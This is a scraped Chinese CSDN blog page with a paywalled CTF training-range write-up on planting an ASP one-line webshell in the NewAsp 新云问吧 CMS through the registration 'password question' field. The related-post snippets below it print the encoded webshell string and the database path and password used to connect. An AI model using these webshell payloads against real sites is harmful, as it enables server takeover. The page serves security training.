墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

最新推荐文章于 2024-07-14 20:19:37 发布
最新推荐文章于 2024-07-14 20:19:37 发布
阅读量413 收藏
点赞数
分类专栏: 靶场实战 文章标签: CMS 安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/104022320
版权
本文介绍了对一个内部使用的类似百度知道的互动平台——新云问吧CMS进行安全检测的过程。重点是利用CMS的过滤不严,通过用户注册时的‘密码问题’字段向数据库植入一句话木马,成功获取webshell。解题步骤包括编码木马、插入数据库、使用菜刀连接并找到key文件,最终提交key值完成任务。
摘要由CSDN通过智能技术生成

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

题目

在这里插入图片描述

背景介绍

某公司内部搭建了一个类似百度知道的互动知识问答分享平台–新云问吧CMS。
为了确保该网站的安全性,故请你检测该网站是否存在安全漏洞。

实训目标

了解并运用新云问吧CMS的通用漏洞–问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。

解题方向

根据右图提示,在用户注册或修改用户资料的“密码问题”处测试。

解题步骤

启动靶机,访问链接。
在这里插入图片描述
按照题目提示,应该是在注册页面的“密码问题”那里插入一句话木马到数据库。
但是我们的一句话要进行编码才能用。

<%execute(request("a"))</
最低0.47元/天 解锁文章
CNwanku
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场 中级CMS系统漏洞分析溯源(第2
qq_43233085的博客
01-17 691
墨者靶场 中级CMS系统漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解...
墨者学院-编辑器漏洞分析溯源(第3)
JimWu的博客
09-05 506
编辑器漏洞分析溯源(第3) 难易程度:★★★ 目类型:编辑器漏洞 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,首先了解DotNetTextBox编辑器的基本特征。 默认的上传路径为:/system_dntb/uploadimg.aspx 2.打开后,发现是不允许上传的。 试图在F12情况下,将disabled修改enabled,虽然能上传,但会报错。 3.利用Do...
墨者学院-CMS系统漏洞分析溯源(第3)
臭nana的博客
12-18 461
点击注册,其他地方随便填,除了密码问上填上 ┼攠數畣整爠煥敵瑳∨≡┩愾(一句话的unicode加密)详解:https://www.jianshu.com/p/b48845cf08b8?tdsourcetag=s_pcqq_aiomsg 之前百度的cms新云问吧的漏洞上第一篇文章的一句马是错的,结果重新注册又得7200秒,没办法,只好关了重新开 第二次上传成功,底部出现这种提示 默认数据库...
熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
xt350488的博客
07-14 1008
建议自定义错误页面,以避免编程语言特性导致的网站根目录泄露问,从而减少不必要的安全风险。原文:https://mp.weixin.qq.com/s/NkyXg3Dm5ZzFUGpqn0uzBQ。
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
漏洞复现——新云问吧漏洞
weixin_30294709的博客
11-25 390
漏洞描述:在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,从而拿到shell 漏洞分析:在密码问处填写“┼攠數畣整爠煥敵瑳∨≡┩愾”,即“<% execute request("a")%>”经过Erlang 中文简体字GB2312 转 unicode 转换来的,然后确定就可以了 影响版本:Powered by:NewAsp CMS Version 4.0.0 SP1...
CMS系统漏洞分析溯源(第3)
weixin_50698958的博客
10-05 335
靶场: https://www.mozhe.cn/bug/detail/eHAzLzNPdVUvbkRvOS9uczRCM1J4Zz09bW96aGUmozhe 背景介绍 某公司内部搭建了一个类似百度知道的互动知识问答分享平台--新云问吧CMS。为了确保该网站的安全性,故请你检测该网站是否存在安全漏洞。 实训目标 了解并运用新云问吧CMS的通用漏洞--问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。 解方向 根据右图提
新云漏洞总结篇
收集盒 Book box
05-20 3817
漏洞很简单,就是插一句话到ASK的数据库, 直接访问ask,然后注册用户,密码问这插入一句话:┼攠數畣整爠煥敵瑳∨≡┩愾 注册成功后一句话连接:ask/data/ask_newasp.asa 密码:a 1.SQL注入漏洞 注册帐号-->发布文章-->文章管理-->属性 http://url/user/articlelist.asp?action=view&chann
SQL通用防注入系统asp版 插一句话漏洞利用
weixin_30314813的博客
08-06 243
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp 既然做了记录,再查看了下它的记录文件 于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的. ┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode) 提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 ht...
史上最全一句话木马
hackzkaq的博客
06-29 7823
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
熊海(isea cms)代码审计漏洞总结
Alexz__的博客
04-30 4564
iseacms简介 后台越权登录admin用户 后台/admin下SQL注入 文件包含漏洞 存储型XSS 管理界面CSRF删除文章 壹 iseacms简介 熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发; 网站样式设计简洁大方,整体功能点并不多,但功能正好够用;拥有一个前端客户端访问界面和一个完备的后台管理系统,并...
代码审计-熊海CMSv1.0
sx____的博客
04-28 475
使用seay代码审计系统进行自动审计,发现有文件包含漏洞、sql注入漏洞和任意文件读取漏洞。
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 375
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。Access只有联合注入和布尔盲注。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值